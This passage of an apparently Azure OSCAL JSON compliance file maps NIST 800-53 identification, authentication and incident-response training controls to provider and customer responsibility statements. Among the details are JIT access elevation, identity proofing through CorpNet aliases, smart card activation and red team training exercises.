_x000D_"}],"responsibilities":[{"uuid":"e3ef21b9-9786-4e71-84bc-2b727a6a2672","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-048"}],"description":"The customer is responsible for only accepting third-party credentials that have been approved by the Federal Identity, Credential, and Access Management (FICAM) Trust Framework Solutions initiative. Note: if the customer's deployed resources do not allow third-party credentials this control is not applicable.","provided-uuid":"442279db-9c24-4c6a-ba06-cef82a6fbe8e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"bb9bf700-70fb-451a-b79c-d417b9c6a1bf","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-8.4","statements":[{"uuid":"961dfcb9-7856-441d-892e-a9c4f9172620","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ia-8.4_smt","by-components":[{"uuid":"40bd5362-b19a-49ad-98cf-33d8fd3e95d0","export":{"provided":[{"uuid":"4e33db7f-8c64-430a-91fc-99b60a21dd27","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"}],"description":"Azure does not allow any non-organizational users to authenticate to production systems. Azure does not accept or process any third-party credentials._x000D_ _x000D_"}],"responsibilities":[{"uuid":"1f2f503d-277a-4499-96a0-7b9d272f580c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-049"}],"description":"The customer is responsible for conforming to the profiles issued by the Federal Identity, Credential, and Access Management (FICAM) Trust Framework Solutions initiative. Note: if the customer's deployed resources do not allow third-party credentials this control is not applicable.","provided-uuid":"4e33db7f-8c64-430a-91fc-99b60a21dd27"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"183452e8-6bb5-43eb-92c1-2f24b1c0ce7c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-11","statements":[{"uuid":"6cad257e-163d-4c46-b18a-0a5e5b2fc808","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-11_smt","by-components":[{"uuid":"cbc488eb-5115-4a1f-9223-988ba962bd27","export":{"provided":[{"uuid":"af3a0232-33dc-444f-aec9-8d137ba2c84b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"}],"description":"By default, accounts do not have active elevated permissions to the production environment. Elevation requires a user to request temporary Just In Time (JIT) access through the JIT portal. Azure requires users to re-authenticate when one of two situations occur: * When the user's credentials change or authenticators expire, or * When privilege escalation is required, such as when JIT access is needed When authenticators expire, an Azure user must reauthenticate following the password change. When an Azure user require administrative access to services within the environment, they must submit a request for elevation and be granted access via the JIT service. Access via JIT requires the creation of temporary authenticators, requiring an additional level of access control. Azure leverages Secure Admin Workstation (SAW) workstations which serve as gateway into Azure FedRAMP High and DoD SRG defined authorization boundary. The screensaver session lock is activated within 10 minutes of inactivity on the Secure Admin Workstation (SAW). Therefore, personnel are required to re-authenticate within 10 minutes of inactivity from the SAW workstations."}],"responsibilities":[{"uuid":"3d4542e9-a19e-46bf-aff2-75b3119ae828","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-050"}],"description":"The customer is responsible for requiring users to re-authenticate when organization-defined circumstances or situations require re-authentication.","provided-uuid":"af3a0232-33dc-444f-aec9-8d137ba2c84b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5bbca062-f4e3-429a-a4b8-1bfee40390dc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12","statements":[{"uuid":"4ba4d8c1-ec76-4c25-a983-5ea8636bce02","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.a","by-components":[{"uuid":"17ceb941-ad1f-40ce-8f4e-39409db956ca","export":{"provided":[{"uuid":"653a1f27-8b4c-45a5-acc5-8530e0333ddd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"d391de06-b255-45d0-8b3a-410d2a07e803","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-051"}],"description":"The customer is responsible for identity proofing users that require accounts for logical access to systems based on appropriate identity assurance level requirements as specified in applicable standards and guidelines.","provided-uuid":"653a1f27-8b4c-45a5-acc5-8530e0333ddd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"97b0bc6d-d8dd-4f12-8f2b-9bd39e209669","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.b","by-components":[{"uuid":"33b8526b-170c-448b-b325-a51266f1010e","export":{"provided":[{"uuid":"94e4d0a6-cf68-495c-b9cd-b93e03ebcac0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"}],"description":"The Microsoft CorpNet alias that follows all Microsoft personnel is unique, and ensures that non-repudiation is implemented and Azure is able to resolve user identities to a unique individual. This CorpNet alias is used in all Azure identity domains to ensure non-repudiation and resolution of user identities to a unique individual globally across all clouds."}],"responsibilities":[{"uuid":"5e47e030-67b9-4ac3-b4f9-605a2297b7c8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-052"}],"description":"The customer is responsible for resolving user identities to a unique individual.","provided-uuid":"94e4d0a6-cf68-495c-b9cd-b93e03ebcac0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0f9095ec-0c07-4708-9860-fb4e8d7827ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12_smt.c","by-components":[{"uuid":"7c209870-0d70-4270-9ee7-7907d3ea7171","export":{"provided":[{"uuid":"9dffb783-32cf-4b2b-8c79-bd1dc66a49ff","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"}],"description":"As a part of initial account setup on the Microsoft corporate network (CorpNet), all Microsoft personnel have their identity validated using government-issued identification. This establishes the user's alias, which is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is then requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds."}],"responsibilities":[{"uuid":"089df601-c4d4-4f78-a98a-091f52f1cef3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-053"}],"description":"The customer is responsible for collecting, validating, and verifying identity evidence.","provided-uuid":"9dffb783-32cf-4b2b-8c79-bd1dc66a49ff"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0eae8e47-4a6b-441a-b039-56efc1dde64f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.2","statements":[{"uuid":"49fbc423-c690-4cd5-9cc4-4d9f650d06b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.2_smt","by-components":[{"uuid":"9a0528f2-d8f2-4446-a530-e0ce4191b345","export":{"provided":[{"uuid":"e589b81f-2755-492b-9a7f-7e24ffaf6db7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"2abaeebc-c058-49a8-bbd1-9e1250d480b7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-054"}],"description":"The customer is responsible for requiring evidence of individual identification be presented to the registration authority.","provided-uuid":"e589b81f-2755-492b-9a7f-7e24ffaf6db7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"1d738f83-4940-40ec-a41d-3cbe0968105c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.3","statements":[{"uuid":"d3a2c3c3-2769-4110-9cd1-dffd9c871947","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.3_smt","by-components":[{"uuid":"f34e12db-f082-406c-9fc2-25ce4fe0c106","export":{"provided":[{"uuid":"6dc8eba9-4577-45e1-a899-297f393d5cc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"9e91397c-713f-408c-82ec-7fe25de09ad3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-055"}],"description":"The customer is responsible for requiring that the presented identity evidence be validated and verified through organizational defined methods of validation and verification.","provided-uuid":"6dc8eba9-4577-45e1-a899-297f393d5cc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6db7d132-773d-41be-9f01-27333e35efc5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.4","statements":[{"uuid":"361c941f-2365-4ca5-a060-41882beaf012","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.4_smt","by-components":[{"uuid":"6209a076-b605-47a2-9a74-856e9d79eeaf","export":{"provided":[{"uuid":"4a97f808-03c4-48a0-af4c-9fadc2bacf3b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"649f1e10-d8f1-4382-a500-1435cd914b51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-056"}],"description":"The customer is responsible for requiring that the validation and verification of identity evidence be conducted in person before a designated registration authority.","provided-uuid":"4a97f808-03c4-48a0-af4c-9fadc2bacf3b"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"72dc563e-9d49-4f02-b735-b39fff248805","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"ia-12.5","statements":[{"uuid":"54b278e8-4d74-4ad7-aa43-1ee92de1f69a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ia-12.5_smt","by-components":[{"uuid":"6d146c6f-03ee-4cc7-ab9f-a6fdb9aecabc","export":{"provided":[{"uuid":"e29f732a-0d19-4e48-bcf7-db912dfef5d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"}],"description":"As a part of initial account setup on Microsoft's corporate network, known as CorpNet, all Microsoft personnel have their identity validated using government-issued identification. This identity validation is then used to activate the user's CorpNet account, known as an alias. This alias is then used to implement non-repudiation throughout all Azure production environments. Access to production Azure clouds is requested via the CorpNet alias, ensuring identity proofing is implemented across all clouds. This alias is consistent across all a user's accounts in all Microsoft domains. All Azure access requests and approvals leverage these CorpNet aliases. New Azure user accounts refer to identities of existing Microsoft users using their unique CorpNet identifiers, known as aliases, who require access to Azure resources. The validation is conducted virtually by the third-party vendor, HireRight. Their responsibility is to perform background checks and verify government-issued IDs prior to the issuance of CorpNet aliases to Microsoft personnel. This process ensures the integrity and security of Microsoft Azure operations. Azure smart cards tied to the specific environment of access are shipped via FedEx in a deactivated state and cannot be used until they are activated. A note is added to the user's account confirming the shipping number for tracking. Shipments require a signature for delivery. Smart cards are not activated until Core Services Engineering and Operations (CSEO) receives a confirmation email from the recipient, recipient's manager, AAM, or Security, ensuring the user's alias is consistent and validating the user's identity. The recipient must email the ticketing team from their Microsoft corporate email. The ticketing team provides the response. The smart card team works with the recipient to unlock their smart card via the ticketing tool. If the user is located in the Puget Sound region, they must come to the main Microsoft campus to pick up their smart card. If the user is outside of the Puget Sound region, the smart card is shipped directly to the individual and auto-disabled until activated by the user."}],"responsibilities":[{"uuid":"a41f86fd-d7c5-4bc7-9161-001a17b55232","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IA-07-057"}],"description":"The customer is responsible for requiring that a registration code or notice of proofing be delivered through an out-of-band channel to verify the users address (physical or digital) of record.","provided-uuid":"e29f732a-0d19-4e48-bcf7-db912dfef5d2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8e30a3bb-1d99-4be6-b05d-496a66c4c70f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2","statements":[{"uuid":"29525144-f686-4e62-a0f6-6bb090c35d86","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2_smt.a","by-components":[{"uuid":"a7e2ed21-855c-407b-a4b2-af6db8aeaa0d","export":{"provided":[{"uuid":"556786df-c16b-44bc-8085-7737da1eb23a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"}],"description":"Microsoft provides training annually to all Azure personnel on how to recognize, respond to, and report incidents as part of the basic security awareness training provided via the Security and Privacy Foundations and STRIKE training. As documented in the Azure Incident Management SOP, incident managers ensure that all personnel, including new hires, are trained on incident handling procedures and protocols consistent with assigned roles and responsibilities._x000D_ _x000D_ This training is comprised of on-the-job oversight by current members of the Security Response Team. The Security Response Team uses job shadowing of real incidents and red team engagements due to the centralized nature of the incident management function in Azure and the availability of job-shadowing within the Security Response Team. Live, ongoing, on-the-job training provides a more thorough and realistic incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. After a period of apprenticeship, generally around sixty days, the Security Response Team provides unaccompanied access to all necessary systems, if appropriate. While there is no specific annual refresher course in incident management, the Security Response Team is continuously trained through daily incident management activities, team meetings, and engagement with external organizations._x000D_ _x000D_ The following roles in Azure Incident Management require specific on-boarding training: Incident Engineer, Incident Manager, Security Incident Engineer, Security Incident Manager, and Communications Manager. Part of the training replicates a real incident and walks personnel through the incident management process. Additionally, incident management tests and exercises are considered in-place training and are used to support other onsite training for new employees and other support staff with incident roles. Personnel are not made aware that they are being tested during incident management tests._x000D_ _x000D_ As part of the service team-specific incident management procedures, each team provides additional information and training to provide an understanding of the team's distinct responsibilities and accountabilities in support of incident management. Service teams designate incident management personnel or distribution lists as part of Service Tree configurations._x000D_ _x000D_"}],"responsibilities":[{"uuid":"0c9ad911-fb66-41a3-81cd-0323e4f4933a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-006"}],"description":"The customer is responsible for providing incident response training to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"556786df-c16b-44bc-8085-7737da1eb23a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1b495f8e-8e87-44d0-a429-f11642133609","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2_smt.b","by-components":[{"uuid":"f11d00c6-6bdc-44c6-aa2b-ba4d31288a7e","export":{"provided":[{"uuid":"b2fb98e2-11a7-49dc-a65b-e8ce49feabf2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"}],"description":"As changes to Azure assets and procedures occur, Azure management considers whether additional incident management training is needed. If so, the training is developed and provided to applicable personnel. This includes training provided through on-the-job requirements, SOP updates, and team meetings._x000D_ _x000D_"}],"responsibilities":[{"uuid":"db71b007-22de-4dbf-975d-80c3733e0575","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-007"}],"description":"The customer is responsible for providing incident response retraining to users of customer-deployed resources, when changes occur, in accordance with assigned roles and responsibilities.","provided-uuid":"b2fb98e2-11a7-49dc-a65b-e8ce49feabf2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0774adb0-6ba8-49d7-97e0-8ebe02cb942f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2.1","statements":[{"uuid":"5e14354c-05da-4e90-a32a-430de2ed4c6a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2.1_smt","by-components":[{"uuid":"478f496f-f331-4f5d-936c-84d43e4cc024","export":{"provided":[{"uuid":"718ac3df-8879-47fc-9b4f-0d64bfc3cdaf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"}],"description":"Service teams include Red Team exercises as part of incident management training. Red Team exercises are intended to identify weaknesses in the existing incident management processes. Incident tests and exercises are considered in-place training and are used to support other onsite training for new personnel with incident roles._x000D_ _x000D_ Service teams include tabletop and functional exercises as part of incident management training. Part of the training replicates a real incident and walks personnel through the incident management process. Additionally, incident management tests and exercises are considered in-place training and are used to support other onsite training for new employees and other support staff with incident roles. Personnel are not made aware that they are being tested during incident management tests._x000D_ _x000D_ As part of the service team-specific incident management procedures, each team provides additional information and training to provide an understanding of the team's distinct responsibilities and accountabilities in support of incident management._x000D_ _x000D_ The Security Response Team uses job shadowing of real and red team incidents due to the centralized nature of the incident management function in Azure and the availability of job-shadowing within the Security Response Team. Live, ongoing, on the job training provides a more thorough and realistic security incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. Azure considers job shadowing of live incidents a preferred and more effective alternative to simulated training mechanisms._x000D_ _x000D_ As part of the service team-specific incident management procedures, each team provides additional information and training to provide an understanding of the team's distinct responsibilities and accountabilities in support of incident management._x000D_ _x000D_"}],"responsibilities":[{"uuid":"fa17958c-0e36-458f-9f61-7c3a0b30338e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-008"}],"description":"The customer is responsible for providing incident response training, which incorporates simulated events, to users of customer-deployed resources in accordance with assigned roles and responsibilities.","provided-uuid":"718ac3df-8879-47fc-9b4f-0d64bfc3cdaf"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"ca452da0-691f-4a57-bd6a-1e9e5fbbaecb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ir-2.2","statements":[{"uuid":"ca415d48-70b4-4a86-ac26-fc5323c5ee48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-2.2_smt","by-components":[{"uuid":"7591d9b9-957c-4a9c-a44c-fce02db9862e","export":{"provided":[{"uuid":"b66f8081-f346-4c1d-8087-83d42dba1037","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-009"}],"description":"To provide a thorough and realistic environment, security incident management training occurs through on-the-job shadowing during real and red team incidents affecting the production environment, with senior security incident responders training newer personnel to provide real world experience and situations for training purposes. Live, ongoing, on the job training provides a more thorough and realistic security incident management training environment by indoctrinating all stakeholders with the incident management procedures in real time. Azure considers job shadowing of live incidents a preferred and more effective alternative to automated training mechanisms._x000D_ 